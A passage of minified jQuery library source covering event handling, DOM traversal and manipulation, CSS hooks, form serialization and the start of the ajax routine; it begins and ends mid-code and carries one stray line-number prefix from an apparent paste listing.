x().off(e),s.apply(this,arguments)},i.guid=s.guid||(s.guid=x.guid++)),this.each(function(){x.event.add(this,e,i,r,n)})},one:function(e,t,n,r){return this.on(e,t,n,r,1)},off:function(e,n,r){var i,o;if(e&&e.preventDefault&&e.handleObj)return i=e.handleObj,x(e.delegateTarget).off(i.namespace?i.origType+"."+i.namespace:i.origType,i.selector,i.handler),this;if("object"==typeof e){for(o in e)this.off(o,n,e[o]);return this}return(n===!1||"function"==typeof n)&&(r=n,n=t),r===!1&&(r=ot),this.each(function(){x.event.remove(this,e,r,n)})},trigger:function(e,t){return this.each(function(){x.event.trigger(e,t,this)})},triggerHandler:function(e,n){var r=this[0];return r?x.event.trigger(e,n,r,!0):t}});var st=/^.[^:#\[\.,]*$/,lt=/^(?:parents|prev(?:Until|All))/,ut=x.expr.match.needsContext,ct={children:!0,contents:!0,next:!0,prev:!0};x.fn.extend({find:function(e){var t,n=[],r=this,i=r.length;if("string"!=typeof e)return this.pushStack(x(e).filter(function(){for(t=0;i>t;t++)if(x.contains(r[t],this))return!0}));for(t=0;i>t;t++)x.find(e,r[t],n);return n=this.pushStack(i>1?x.unique(n):n),n.selector=this.selector?this.selector+" "+e:e,n},has:function(e){var t,n=x(e,this),r=n.length;return this.filter(function(){for(t=0;r>t;t++)if(x.contains(this,n[t]))return!0})},not:function(e){return this.pushStack(ft(this,e||[],!0))},filter:function(e){return this.pushStack(ft(this,e||[],!1))},is:function(e){return!!ft(this,"string"==typeof e&&ut.test(e)?x(e):e||[],!1).length},closest:function(e,t){var n,r=0,i=this.length,o=[],a=ut.test(e)||"string"!=typeof e?x(e,t||this.context):0;for(;i>r;r++)for(n=this[r];n&&n!==t;n=n.parentNode)if(11>n.nodeType&&(a?a.index(n)>-1:1===n.nodeType&&x.find.matchesSelector(n,e))){n=o.push(n);break}return this.pushStack(o.length>1?x.unique(o):o)},index:function(e){return e?"string"==typeof e?x.inArray(this[0],x(e)):x.inArray(e.jquery?e[0]:e,this):this[0]&&this[0].parentNode?this.first().prevAll().length:-1},add:function(e,t){var n="string"==typeof e?x(e,t):x.makeArray(e&&e.nodeType?[e]:e),r=x.merge(this.get(),n);return this.pushStack(x.unique(r))},addBack:function(e){return this.add(null==e?this.prevObject:this.prevObject.filter(e))}});function pt(e,t){do e=e[t];while(e&&1!==e.nodeType);return e}x.each({parent:function(e){var t=e.parentNode;return t&&11!==t.nodeType?t:null},parents:function(e){return x.dir(e,"parentNode")},parentsUntil:function(e,t,n){return x.dir(e,"parentNode",n)},next:function(e){return pt(e,"nextSibling")},prev:function(e){return pt(e,"previousSibling")},nextAll:function(e){return x.dir(e,"nextSibling")},prevAll:function(e){return x.dir(e,"previousSibling")},nextUntil:function(e,t,n){return x.dir(e,"nextSibling",n)},prevUntil:function(e,t,n){return x.dir(e,"previousSibling",n)},siblings:function(e){return x.sibling((e.parentNode||{}).firstChild,e)},children:function(e){return x.sibling(e.firstChild)},contents:function(e){return x.nodeName(e,"iframe")?e.contentDocument||e.contentWindow.document:x.merge([],e.childNodes)}},function(e,t){x.fn[e]=function(n,r){var i=x.map(this,t,n);return"Until"!==e.slice(-5)&&(r=n),r&&"string"==typeof r&&(i=x.filter(r,i)),this.length>1&&(ct[e]||(i=x.unique(i)),lt.test(e)&&(i=i.reverse())),this.pushStack(i)}}),x.extend({filter:function(e,t,n){var r=t[0];return n&&(e=":not("+e+")"),1===t.length&&1===r.nodeType?x.find.matchesSelector(r,e)?[r]:[]:x.find.matches(e,x.grep(t,function(e){return 1===e.nodeType}))},dir:function(e,n,r){var i=[],o=e[n];while(o&&9!==o.nodeType&&(r===t||1!==o.nodeType||!x(o).is(r)))1===o.nodeType&&i.push(o),o=o[n];return i},sibling:function(e,t){var n=[];for(;e;e=e.nextSibling)1===e.nodeType&&e!==t&&n.push(e);return n}});function ft(e,t,n){if(x.isFunction(t))return x.grep(e,function(e,r){return!!t.call(e,r,e)!==n});if(t.nodeType)return x.grep(e,function(e){return e===t!==n});if("string"==typeof t){if(st.test(t))return x.filter(t,e,n);t=x.filter(t,e)}return x.grep(e,function(e){return x.inArray(e,t)>=0!==n})}function dt(e){var t=ht.split("|"),n=e.createDocumentFragment();if(n.createElement)while(t.length)n.createElement(t.pop());return n}var ht="abbr|article|aside|audio|bdi|canvas|data|datalist|details|figcaption|figure|footer|header|hgroup|mark|meter|nav|output|progress|section|summary|time|video",gt=/ jQuery\d+="(?:null|\d+)"/g,mt=RegExp("<(?:"+ht+")[\\s/>]","i"),yt=/^\s+/,vt=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,bt=/<([\w:]+)/,xt=/<tbody/i,wt=/<|&#?\w+;/,Tt=/<(?:script|style|link)/i,Ct=/^(?:checkbox|radio)$/i,Nt=/checked\s*(?:[^=]|=\s*.checked.)/i,kt=/^$|\/(?:java|ecma)script/i,Et=/^true\/(.*)/,St=/^\s*<!(?:\[CDATA\[|--)|(?:\]\]|--)>\s*$/g,At={option:[1,"<select multiple='multiple'>","</select>"],legend:[1,"<fieldset>","</fieldset>"],area:[1,"<map>","</map>"],param:[1,"<object>","</object>"],thead:[1,"<table>","</table>"],tr:[2,"<table><tbody>","</tbody></table>"],col:[2,"<table><tbody></tbody><colgroup>","</colgroup></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],_default:x.support.htmlSerialize?[0,"",""]:[1,"X<div>","</div>"]},jt=dt(a),Dt=jt.appendChild(a.createElement("div"));At.optgroup=At.option,At.tbody=At.tfoot=At.colgroup=At.caption=At.thead,At.th=At.td,x.fn.extend({text:function(e){return x.access(this,function(e){return e===t?x.text(this):this.empty().append((this[0]&&this[0].ownerDocument||a).createTextNode(e))},null,e,arguments.length)},append:function(){return this.domManip(arguments,function(e){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var t=Lt(this,e);t.appendChild(e)}})},prepend:function(){return this.domManip(arguments,function(e){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var t=Lt(this,e);t.insertBefore(e,t.firstChild)}})},before:function(){return this.domManip(arguments,function(e){this.parentNode&&this.parentNode.insertBefore(e,this)})},after:function(){return this.domManip(arguments,function(e){this.parentNode&&this.parentNode.insertBefore(e,this.nextSibling)})},remove:function(e,t){var n,r=e?x.filter(e,this):this,i=0;for(;null!=(n=r[i]);i++)t||1!==n.nodeType||x.cleanData(Ft(n)),n.parentNode&&(t&&x.contains(n.ownerDocument,n)&&_t(Ft(n,"script")),n.parentNode.removeChild(n));return this},empty:function(){var e,t=0;for(;null!=(e=this[t]);t++){1===e.nodeType&&x.cleanData(Ft(e,!1));while(e.firstChild)e.removeChild(e.firstChild);e.options&&x.nodeName(e,"select")&&(e.options.length=0)}return this},clone:function(e,t){return e=null==e?!1:e,t=null==t?e:t,this.map(function(){return x.clone(this,e,t)})},html:function(e){return x.access(this,function(e){var n=this[0]||{},r=0,i=this.length;if(e===t)return 1===n.nodeType?n.innerHTML.replace(gt,""):t;if(!("string"!=typeof e||Tt.test(e)||!x.support.htmlSerialize&&mt.test(e)||!x.support.leadingWhitespace&&yt.test(e)||At[(bt.exec(e)||["",""])[1].toLowerCase()])){e=e.replace(vt,"<$1></$2>");try{for(;i>r;r++)n=this[r]||{},1===n.nodeType&&(x.cleanData(Ft(n,!1)),n.innerHTML=e);n=0}catch(o){}}n&&this.empty().append(e)},null,e,arguments.length)},replaceWith:function(){var e=x.map(this,function(e){return[e.nextSibling,e.parentNode]}),t=0;return this.domManip(arguments,function(n){var r=e[t++],i=e[t++];i&&(r&&r.parentNode!==i&&(r=this.nextSibling),x(this).remove(),i.insertBefore(n,r))},!0),t?this:this.remove()},detach:function(e){return this.remove(e,!0)},domManip:function(e,t,n){e=d.apply([],e);var r,i,o,a,s,l,u=0,c=this.length,p=this,f=c-1,h=e[0],g=x.isFunction(h);if(g||!(1>=c||"string"!=typeof h||x.support.checkClone)&&Nt.test(h))return this.each(function(r){var i=p.eq(r);g&&(e[0]=h.call(this,r,i.html())),i.domManip(e,t,n)});if(c&&(l=x.buildFragment(e,this[0].ownerDocument,!1,!n&&this),r=l.firstChild,1===l.childNodes.length&&(l=r),r)){for(a=x.map(Ft(l,"script"),Ht),o=a.length;c>u;u++)i=l,u!==f&&(i=x.clone(i,!0,!0),o&&x.merge(a,Ft(i,"script"))),t.call(this[u],i,u);if(o)for(s=a[a.length-1].ownerDocument,x.map(a,qt),u=0;o>u;u++)i=a[u],kt.test(i.type||"")&&!x._data(i,"globalEval")&&x.contains(s,i)&&(i.src?x._evalUrl(i.src):x.globalEval((i.text||i.textContent||i.innerHTML||"").replace(St,"")));l=r=null}return this}});function Lt(e,t){return x.nodeName(e,"table")&&x.nodeName(1===t.nodeType?t:t.firstChild,"tr")?e.getElementsByTagName("tbody")[0]||e.appendChild(e.ownerDocument.createElement("tbody")):e}function Ht(e){return e.type=(null!==x.find.attr(e,"type"))+"/"+e.type,e}function qt(e){var t=Et.exec(e.type);return t?e.type=t[1]:e.removeAttribute("type"),e}function _t(e,t){var n,r=0;for(;null!=(n=e[r]);r++)x._data(n,"globalEval",!t||x._data(t[r],"globalEval"))}function Mt(e,t){if(1===t.nodeType&&x.hasData(e)){var n,r,i,o=x._data(e),a=x._data(t,o),s=o.events;if(s){delete a.handle,a.events={};for(n in s)for(r=0,i=s[n].length;i>r;r++)x.event.add(t,n,s[n][r])}a.data&&(a.data=x.extend({},a.data))}}function Ot(e,t){var n,r,i;if(1===t.nodeType){if(n=t.nodeName.toLowerCase(),!x.support.noCloneEvent&&t[x.expando]){i=x._data(t);for(r in i.events)x.removeEvent(t,r,i.handle);t.removeAttribute(x.expando)}"script"===n&&t.text!==e.text?(Ht(t).text=e.text,qt(t)):"object"===n?(t.parentNode&&(t.outerHTML=e.outerHTML),x.support.html5Clone&&e.innerHTML&&!x.trim(t.innerHTML)&&(t.innerHTML=e.innerHTML)):"input"===n&&Ct.test(e.type)?(t.defaultChecked=t.checked=e.checked,t.value!==e.value&&(t.value=e.value)):"option"===n?t.defaultSelected=t.selected=e.defaultSelected:("input"===n||"textarea"===n)&&(t.defaultValue=e.defaultValue)}}x.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(e,t){x.fn[e]=function(e){var n,r=0,i=[],o=x(e),a=o.length-1;for(;a>=r;r++)n=r===a?this:this.clone(!0),x(o[r])[t](n),h.apply(i,n.get());return this.pushStack(i)}});function Ft(e,n){var r,o,a=0,s=typeof e.getElementsByTagName!==i?e.getElementsByTagName(n||"*"):typeof e.querySelectorAll!==i?e.querySelectorAll(n||"*"):t;if(!s)for(s=[],r=e.childNodes||e;null!=(o=r[a]);a++)!n||x.nodeName(o,n)?s.push(o):x.merge(s,Ft(o,n));return n===t||n&&x.nodeName(e,n)?x.merge([e],s):s}function Bt(e){Ct.test(e.type)&&(e.defaultChecked=e.checked)}x.extend({clone:function(e,t,n){var r,i,o,a,s,l=x.contains(e.ownerDocument,e);if(x.support.html5Clone||x.isXMLDoc(e)||!mt.test("<"+e.nodeName+">")?o=e.cloneNode(!0):(Dt.innerHTML=e.outerHTML,Dt.removeChild(o=Dt.firstChild)),!(x.support.noCloneEvent&&x.support.noCloneChecked||1!==e.nodeType&&11!==e.nodeType||x.isXMLDoc(e)))for(r=Ft(o),s=Ft(e),a=0;null!=(i=s[a]);++a)r[a]&&Ot(i,r[a]);if(t)if(n)for(s=s||Ft(e),r=r||Ft(o),a=0;null!=(i=s[a]);a++)Mt(i,r[a]);else Mt(e,o);return r=Ft(o,"script"),r.length>0&&_t(r,!l&&Ft(e,"script")),r=s=i=null,o},buildFragment:function(e,t,n,r){var i,o,a,s,l,u,c,p=e.length,f=dt(t),d=[],h=0;for(;p>h;h++)if(o=e[h],o||0===o)if("object"===x.type(o))x.merge(d,o.nodeType?[o]:o);else if(wt.test(o)){s=s||f.appendChild(t.createElement("div")),l=(bt.exec(o)||["",""])[1].toLowerCase(),c=At[l]||At._default,s.innerHTML=c[1]+o.replace(vt,"<$1></$2>")+c[2],i=c[0];while(i--)s=s.lastChild;if(!x.support.leadingWhitespace&&yt.test(o)&&d.push(t.createTextNode(yt.exec(o)[0])),!x.support.tbody){o="table"!==l||xt.test(o)?"<table>"!==c[1]||xt.test(o)?0:s:s.firstChild,i=o&&o.childNodes.length;while(i--)x.nodeName(u=o.childNodes[i],"tbody")&&!u.childNodes.length&&o.removeChild(u)}x.merge(d,s.childNodes),s.textContent="";while(s.firstChild)s.removeChild(s.firstChild);s=f.lastChild}else d.push(t.createTextNode(o));s&&f.removeChild(s),x.support.appendChecked||x.grep(Ft(d,"input"),Bt),h=0;while(o=d[h++])if((!r||-1===x.inArray(o,r))&&(a=x.contains(o.ownerDocument,o),s=Ft(f.appendChild(o),"script"),a&&_t(s),n)){i=0;while(o=s[i++])kt.test(o.type||"")&&n.push(o)}return s=null,f},cleanData:function(e,t){var n,r,o,a,s=0,l=x.expando,u=x.cache,c=x.support.deleteExpando,f=x.event.special;for(;null!=(n=e[s]);s++)if((t||x.acceptData(n))&&(o=n[l],a=o&&u[o])){if(a.events)for(r in a.events)f[r]?x.event.remove(n,r):x.removeEvent(n,r,a.handle);
  6. u[o]&&(delete u[o],c?delete n[l]:typeof n.removeAttribute!==i?n.removeAttribute(l):n[l]=null,p.push(o))}},_evalUrl:function(e){return x.ajax({url:e,type:"GET",dataType:"script",async:!1,global:!1,"throws":!0})}}),x.fn.extend({wrapAll:function(e){if(x.isFunction(e))return this.each(function(t){x(this).wrapAll(e.call(this,t))});if(this[0]){var t=x(e,this[0].ownerDocument).eq(0).clone(!0);this[0].parentNode&&t.insertBefore(this[0]),t.map(function(){var e=this;while(e.firstChild&&1===e.firstChild.nodeType)e=e.firstChild;return e}).append(this)}return this},wrapInner:function(e){return x.isFunction(e)?this.each(function(t){x(this).wrapInner(e.call(this,t))}):this.each(function(){var t=x(this),n=t.contents();n.length?n.wrapAll(e):t.append(e)})},wrap:function(e){var t=x.isFunction(e);return this.each(function(n){x(this).wrapAll(t?e.call(this,n):e)})},unwrap:function(){return this.parent().each(function(){x.nodeName(this,"body")||x(this).replaceWith(this.childNodes)}).end()}});var Pt,Rt,Wt,$t=/alpha\([^)]*\)/i,It=/opacity\s*=\s*([^)]*)/,zt=/^(top|right|bottom|left)$/,Xt=/^(none|table(?!-c[ea]).+)/,Ut=/^margin/,Vt=RegExp("^("+w+")(.*)$","i"),Yt=RegExp("^("+w+")(?!px)[a-z%]+$","i"),Jt=RegExp("^([+-])=("+w+")","i"),Gt={BODY:"block"},Qt={position:"absolute",visibility:"hidden",display:"block"},Kt={letterSpacing:0,fontWeight:400},Zt=["Top","Right","Bottom","Left"],en=["Webkit","O","Moz","ms"];function tn(e,t){if(t in e)return t;var n=t.charAt(0).toUpperCase()+t.slice(1),r=t,i=en.length;while(i--)if(t=en[i]+n,t in e)return t;return r}function nn(e,t){return e=t||e,"none"===x.css(e,"display")||!x.contains(e.ownerDocument,e)}function rn(e,t){var n,r,i,o=[],a=0,s=e.length;for(;s>a;a++)r=e[a],r.style&&(o[a]=x._data(r,"olddisplay"),n=r.style.display,t?(o[a]||"none"!==n||(r.style.display=""),""===r.style.display&&nn(r)&&(o[a]=x._data(r,"olddisplay",ln(r.nodeName)))):o[a]||(i=nn(r),(n&&"none"!==n||!i)&&x._data(r,"olddisplay",i?n:x.css(r,"display"))));for(a=0;s>a;a++)r=e[a],r.style&&(t&&"none"!==r.style.display&&""!==r.style.display||(r.style.display=t?o[a]||"":"none"));return e}x.fn.extend({css:function(e,n){return x.access(this,function(e,n,r){var i,o,a={},s=0;if(x.isArray(n)){for(o=Rt(e),i=n.length;i>s;s++)a[n[s]]=x.css(e,n[s],!1,o);return a}return r!==t?x.style(e,n,r):x.css(e,n)},e,n,arguments.length>1)},show:function(){return rn(this,!0)},hide:function(){return rn(this)},toggle:function(e){return"boolean"==typeof e?e?this.show():this.hide():this.each(function(){nn(this)?x(this).show():x(this).hide()})}}),x.extend({cssHooks:{opacity:{get:function(e,t){if(t){var n=Wt(e,"opacity");return""===n?"1":n}}}},cssNumber:{columnCount:!0,fillOpacity:!0,fontWeight:!0,lineHeight:!0,opacity:!0,order:!0,orphans:!0,widows:!0,zIndex:!0,zoom:!0},cssProps:{"float":x.support.cssFloat?"cssFloat":"styleFloat"},style:function(e,n,r,i){if(e&&3!==e.nodeType&&8!==e.nodeType&&e.style){var o,a,s,l=x.camelCase(n),u=e.style;if(n=x.cssProps[l]||(x.cssProps[l]=tn(u,l)),s=x.cssHooks[n]||x.cssHooks[l],r===t)return s&&"get"in s&&(o=s.get(e,!1,i))!==t?o:u[n];if(a=typeof r,"string"===a&&(o=Jt.exec(r))&&(r=(o[1]+1)*o[2]+parseFloat(x.css(e,n)),a="number"),!(null==r||"number"===a&&isNaN(r)||("number"!==a||x.cssNumber[l]||(r+="px"),x.support.clearCloneStyle||""!==r||0!==n.indexOf("background")||(u[n]="inherit"),s&&"set"in s&&(r=s.set(e,r,i))===t)))try{u[n]=r}catch(c){}}},css:function(e,n,r,i){var o,a,s,l=x.camelCase(n);return n=x.cssProps[l]||(x.cssProps[l]=tn(e.style,l)),s=x.cssHooks[n]||x.cssHooks[l],s&&"get"in s&&(a=s.get(e,!0,r)),a===t&&(a=Wt(e,n,i)),"normal"===a&&n in Kt&&(a=Kt[n]),""===r||r?(o=parseFloat(a),r===!0||x.isNumeric(o)?o||0:a):a}}),e.getComputedStyle?(Rt=function(t){return e.getComputedStyle(t,null)},Wt=function(e,n,r){var i,o,a,s=r||Rt(e),l=s?s.getPropertyValue(n)||s[n]:t,u=e.style;return s&&(""!==l||x.contains(e.ownerDocument,e)||(l=x.style(e,n)),Yt.test(l)&&Ut.test(n)&&(i=u.width,o=u.minWidth,a=u.maxWidth,u.minWidth=u.maxWidth=u.width=l,l=s.width,u.width=i,u.minWidth=o,u.maxWidth=a)),l}):a.documentElement.currentStyle&&(Rt=function(e){return e.currentStyle},Wt=function(e,n,r){var i,o,a,s=r||Rt(e),l=s?s[n]:t,u=e.style;return null==l&&u&&u[n]&&(l=u[n]),Yt.test(l)&&!zt.test(n)&&(i=u.left,o=e.runtimeStyle,a=o&&o.left,a&&(o.left=e.currentStyle.left),u.left="fontSize"===n?"1em":l,l=u.pixelLeft+"px",u.left=i,a&&(o.left=a)),""===l?"auto":l});function on(e,t,n){var r=Vt.exec(t);return r?Math.max(0,r[1]-(n||0))+(r[2]||"px"):t}function an(e,t,n,r,i){var o=n===(r?"border":"content")?4:"width"===t?1:0,a=0;for(;4>o;o+=2)"margin"===n&&(a+=x.css(e,n+Zt[o],!0,i)),r?("content"===n&&(a-=x.css(e,"padding"+Zt[o],!0,i)),"margin"!==n&&(a-=x.css(e,"border"+Zt[o]+"Width",!0,i))):(a+=x.css(e,"padding"+Zt[o],!0,i),"padding"!==n&&(a+=x.css(e,"border"+Zt[o]+"Width",!0,i)));return a}function sn(e,t,n){var r=!0,i="width"===t?e.offsetWidth:e.offsetHeight,o=Rt(e),a=x.support.boxSizing&&"border-box"===x.css(e,"boxSizing",!1,o);if(0>=i||null==i){if(i=Wt(e,t,o),(0>i||null==i)&&(i=e.style[t]),Yt.test(i))return i;r=a&&(x.support.boxSizingReliable||i===e.style[t]),i=parseFloat(i)||0}return i+an(e,t,n||(a?"border":"content"),r,o)+"px"}function ln(e){var t=a,n=Gt[e];return n||(n=un(e,t),"none"!==n&&n||(Pt=(Pt||x("<iframe frameborder='0' width='0' height='0'/>").css("cssText","display:block !important")).appendTo(t.documentElement),t=(Pt[0].contentWindow||Pt[0].contentDocument).document,t.write("<!doctype html><html><body>"),t.close(),n=un(e,t),Pt.detach()),Gt[e]=n),n}function un(e,t){var n=x(t.createElement(e)).appendTo(t.body),r=x.css(n[0],"display");return n.remove(),r}x.each(["height","width"],function(e,n){x.cssHooks[n]={get:function(e,r,i){return r?0===e.offsetWidth&&Xt.test(x.css(e,"display"))?x.swap(e,Qt,function(){return sn(e,n,i)}):sn(e,n,i):t},set:function(e,t,r){var i=r&&Rt(e);return on(e,t,r?an(e,n,r,x.support.boxSizing&&"border-box"===x.css(e,"boxSizing",!1,i),i):0)}}}),x.support.opacity||(x.cssHooks.opacity={get:function(e,t){return It.test((t&&e.currentStyle?e.currentStyle.filter:e.style.filter)||"")?.01*parseFloat(RegExp.$1)+"":t?"1":""},set:function(e,t){var n=e.style,r=e.currentStyle,i=x.isNumeric(t)?"alpha(opacity="+100*t+")":"",o=r&&r.filter||n.filter||"";n.zoom=1,(t>=1||""===t)&&""===x.trim(o.replace($t,""))&&n.removeAttribute&&(n.removeAttribute("filter"),""===t||r&&!r.filter)||(n.filter=$t.test(o)?o.replace($t,i):o+" "+i)}}),x(function(){x.support.reliableMarginRight||(x.cssHooks.marginRight={get:function(e,n){return n?x.swap(e,{display:"inline-block"},Wt,[e,"marginRight"]):t}}),!x.support.pixelPosition&&x.fn.position&&x.each(["top","left"],function(e,n){x.cssHooks[n]={get:function(e,r){return r?(r=Wt(e,n),Yt.test(r)?x(e).position()[n]+"px":r):t}}})}),x.expr&&x.expr.filters&&(x.expr.filters.hidden=function(e){return 0>=e.offsetWidth&&0>=e.offsetHeight||!x.support.reliableHiddenOffsets&&"none"===(e.style&&e.style.display||x.css(e,"display"))},x.expr.filters.visible=function(e){return!x.expr.filters.hidden(e)}),x.each({margin:"",padding:"",border:"Width"},function(e,t){x.cssHooks[e+t]={expand:function(n){var r=0,i={},o="string"==typeof n?n.split(" "):[n];for(;4>r;r++)i[e+Zt[r]+t]=o[r]||o[r-2]||o[0];return i}},Ut.test(e)||(x.cssHooks[e+t].set=on)});var cn=/%20/g,pn=/\[\]$/,fn=/\r?\n/g,dn=/^(?:submit|button|image|reset|file)$/i,hn=/^(?:input|select|textarea|keygen)/i;x.fn.extend({serialize:function(){return x.param(this.serializeArray())},serializeArray:function(){return this.map(function(){var e=x.prop(this,"elements");return e?x.makeArray(e):this}).filter(function(){var e=this.type;return this.name&&!x(this).is(":disabled")&&hn.test(this.nodeName)&&!dn.test(e)&&(this.checked||!Ct.test(e))}).map(function(e,t){var n=x(this).val();return null==n?null:x.isArray(n)?x.map(n,function(e){return{name:t.name,value:e.replace(fn,"\r\n")}}):{name:t.name,value:n.replace(fn,"\r\n")}}).get()}}),x.param=function(e,n){var r,i=[],o=function(e,t){t=x.isFunction(t)?t():null==t?"":t,i[i.length]=encodeURIComponent(e)+"="+encodeURIComponent(t)};if(n===t&&(n=x.ajaxSettings&&x.ajaxSettings.traditional),x.isArray(e)||e.jquery&&!x.isPlainObject(e))x.each(e,function(){o(this.name,this.value)});else for(r in e)gn(r,e[r],n,o);return i.join("&").replace(cn,"+")};function gn(e,t,n,r){var i;if(x.isArray(t))x.each(t,function(t,i){n||pn.test(e)?r(e,i):gn(e+"["+("object"==typeof i?t:"")+"]",i,n,r)});else if(n||"object"!==x.type(t))r(e,t);else for(i in t)gn(e+"["+i+"]",t[i],n,r)}x.each("blur focus focusin focusout load resize scroll unload click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup error contextmenu".split(" "),function(e,t){x.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),x.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)},bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,"**"):this.off(t,e||"**",n)}});var mn,yn,vn=x.now(),bn=/\?/,xn=/#.*$/,wn=/([?&])_=[^&]*/,Tn=/^(.*?):[ \t]*([^\r\n]*)\r?$/gm,Cn=/^(?:about|app|app-storage|.+-extension|file|res|widget):$/,Nn=/^(?:GET|HEAD)$/,kn=/^\/\//,En=/^([\w.+-]+:)(?:\/\/([^\/?#:]*)(?::(\d+)|)|)/,Sn=x.fn.load,An={},jn={},Dn="*/".concat("*");try{yn=o.href}catch(Ln){yn=a.createElement("a"),yn.href="",yn=yn.href}mn=En.exec(yn.toLowerCase())||[];function Hn(e){return function(t,n){"string"!=typeof t&&(n=t,t="*");var r,i=0,o=t.toLowerCase().match(T)||[];if(x.isFunction(n))while(r=o[i++])"+"===r[0]?(r=r.slice(1)||"*",(e[r]=e[r]||[]).unshift(n)):(e[r]=e[r]||[]).push(n)}}function qn(e,n,r,i){var o={},a=e===jn;function s(l){var u;return o[l]=!0,x.each(e[l]||[],function(e,l){var c=l(n,r,i);return"string"!=typeof c||a||o[c]?a?!(u=c):t:(n.dataTypes.unshift(c),s(c),!1)}),u}return s(n.dataTypes[0])||!o["*"]&&s("*")}function _n(e,n){var r,i,o=x.ajaxSettings.flatOptions||{};for(i in n)n[i]!==t&&((o[i]?e:r||(r={}))[i]=n[i]);return r&&x.extend(!0,e,r),e}x.fn.load=function(e,n,r){if("string"!=typeof e&&Sn)return Sn.apply(this,arguments);var i,o,a,s=this,l=e.indexOf(" ");return l>=0&&(i=e.slice(l,e.length),e=e.slice(0,l)),x.isFunction(n)?(r=n,n=t):n&&"object"==typeof n&&(a="POST"),s.length>0&&x.ajax({url:e,type:a,dataType:"html",data:n}).done(function(e){o=arguments,s.html(i?x("<div>").append(x.parseHTML(e)).find(i):e)}).complete(r&&function(e,t){s.each(r,o||[e.responseText,t,e])}),this},x.each(["ajaxStart","ajaxStop","ajaxComplete","ajaxError","ajaxSuccess","ajaxSend"],function(e,t){x.fn[t]=function(e){return this.on(t,e)}}),x.extend({active:0,lastModified:{},etag:{},ajaxSettings:{url:yn,type:"GET",isLocal:Cn.test(mn[1]),global:!0,processData:!0,async:!0,contentType:"application/x-www-form-urlencoded; charset=UTF-8",accepts:{"*":Dn,text:"text/plain",html:"text/html",xml:"application/xml, text/xml",json:"application/json, text/javascript"},contents:{xml:/xml/,html:/html/,json:/json/},responseFields:{xml:"responseXML",text:"responseText",json:"responseJSON"},converters:{"* text":String,"text html":!0,"text json":x.parseJSON,"text xml":x.parseXML},flatOptions:{url:!0,context:!0}},ajaxSetup:function(e,t){return t?_n(_n(e,x.ajaxSettings),t):_n(x.ajaxSettings,e)},ajaxPrefilter:Hn(An),ajaxTransport:Hn(jn),ajax:function(e,n){"object"==typeof e&&(n=e,e=t),n=n||{};var r,i,o,a,s,l,u,c,p=x.ajaxSetup({},n),f=p.context||p,d=p.context&&(f.nodeType||f.jquery)?x(f):x.event,h=x.Deferred(),g=x.Callbacks("once memory"),m=p.statusCode||{},y={},v={},b=0,w="canceled",C={readyState:0,getResponseHeader:function(e){var t;if(2===b){if(!c){c={};while(t=Tn.exec(a))c[t[1].toLowerCase()]=t[2]}t=c[e.toLowerCase()]}return null==t?null:t},getAllResponseHeaders:function(){return 2===b?a:null},setRequestHeader:function(e,t){var n=e.toLowerCase();return b||(e=v[n]=v[n]||e,y[e]=t),this},overrideMimeType:function(e){return b||(p.mimeType=e),this},statusCode:function(e){var t;if(e)if(2>b)for(t in e)m[t]=[m[t],e[t]];else C.always(e[C.status]);return this},abort:function(e){var t=e||w;return u&&u.abort(t),k(0,t),this}};if(h.promise(C).complete=g.add,C.success=C.done,C.error=C.fail,p.url=((e||p.url||yn)+"").replace(xn,"").replace(kn,mn[1]+"//"),p.type=n.method||n.type||p.method||p.type,p.dataTypes=x.trim(p.dataType||"*").toLowerCase().match(T)||[""],null==p.crossDomain&&(r=En.exec(p.url.toLowerCase()),p.crossDomain=!(!r||r[1]===mn[1]&&r[2]===mn[2]&&(r[3]||("http:"===r[1]?"80":"443"))===(mn[3]||("http:"===mn[1]?"80":"443")))),p.data&&p.processData&&"string"!=typeof p.data&&(p.data=x.param(p.data,p.traditional)),qn(An,p,n,C),2===b)return C;l=p.global,l&&0===x.active++&&x.event.trigger("ajaxStart"),p.type=p.type.toUpperCase(),p.hasContent=!Nn.test(p.type),o=p.url,p.hasContent||(p.data&&(o=p.url+=(bn.test(o)?"&":"?")+p.data,delete p.data),p.cache===!1&&(p.url=wn.test(o)?o.replace(wn,"$1_="+vn++):o+(bn.test(o)?"&":"?")+"_="+vn++)),p.ifModified&&(x.lastModified[o]&&C.setRequestHeader("If-Modified-Since",x.lastModified[o]),x.etag[o]&&C.setRequestHeader("If-None-Match",x.etag[o])),(p.data&&p.hasContent&&p.contentType!==!1||n.contentType)&&C.setRequestHeader("Content-Type",p.contentType),C.setRequestHeader("Accept",p.dataTypes[0]&&p.accepts[p.dataTypes[0]]?p.accepts[p.dataTypes[0]]+("*"!==p.dataTypes[0]?", "+Dn+"; q=0.01":""):p.accepts["*"]);for(i in p.headers)C.setRequestHeader(i,p.headers[i]);if(p.beforeSend&&(p.beforeSend.call(f,C,p)===!1||2===b))return C.abort();w="abort";for(i in{success:1,error:1,complete:1})C[i](p[i]);if(u=qn(jn,p,n,C)){C.readyState=1,l&&d.trigger("ajaxSend",[C,p]),p.async&&p.timeout>0&&(s=setTimeout(function(){C.abort("timeout")},p.timeout));try{b=1,u.send(y,k)}catch(N){if(!(2>b))throw N;k(-1,N)}}else k(-1,"No Transport");function k(e,n,r,i){var 